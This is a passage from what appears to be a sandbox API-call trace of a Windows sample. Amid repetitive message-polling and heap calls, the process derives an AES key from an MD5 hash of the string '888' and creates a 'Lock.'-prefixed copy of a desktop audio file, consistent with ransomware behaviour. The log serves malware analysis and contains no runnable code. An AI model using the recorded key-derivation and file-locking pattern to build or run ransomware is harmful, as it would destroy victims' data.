wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0104.136] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0104.136] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0104.136] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.136] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.136] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.136] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0104.136] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0104.136] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0104.136] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0104.136] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0104.136] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0104.136] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.136] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.136] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.136] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.136] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0104.136] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.136] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0104.136] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.136] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.136] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.137] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0104.137] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.137] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0104.137] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.137] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.137] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0104.137] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0104.137] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0104.137] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0104.137] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0104.137] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.137] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.137] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0104.137] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.137] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0104.137] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.137] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.137] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.137] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.138] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.138] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.138] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.138] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.138] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.138] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0104.138] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.138] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0104.138] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.138] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.138] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0104.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9ca0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0104.138] CryptCreateHash (in: hProv=0x9bf6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0104.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0104.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719b8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0104.138] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0104.139] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0104.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0104.139] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.139] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.139] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.139] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.139] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.139] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.139] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0104.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9f28, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0104.139] CryptHashData (hHash=0x9a3b80, pbData=0x2a71a58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0104.139] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.139] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.220] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.220] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.220] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.220] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.220] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.220] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.220] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0104.220] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.220] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0104.220] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.220] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.220] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0104.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9e68, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0104.220] CryptDeriveKey (in: hProv=0x9bf6e8, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4580) returned 1 [0104.220] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.221] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.221] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0104.221] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.221] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0104.221] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0104.221] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0104.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0104.221] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0104.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.221] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.221] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.221] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.221] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.222] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/QgQCsu7ShKSSIL.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\qgqcsu7shkssil.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0104.222] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.222] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0104.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ea0 [0104.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0104.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0104.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0104.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0104.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0104.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0104.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0104.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0104.223] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0104.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0104.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0104.223] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0104.223] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0104.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0104.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0104.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0104.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0104.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0104.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0104.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0104.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0104.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0104.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0104.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0104.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0104.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0104.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0104.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0104.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0104.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0104.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0104.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75c18 [0104.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0104.224] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0104.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75c18 | out: hHeap=0x2af0000) returned 1 [0104.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0104.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0104.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0104.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0104.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0104.225] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.QgQCsu7ShKSSIL.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.qgqcsu7shkssil.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0104.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fe0 [0104.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: 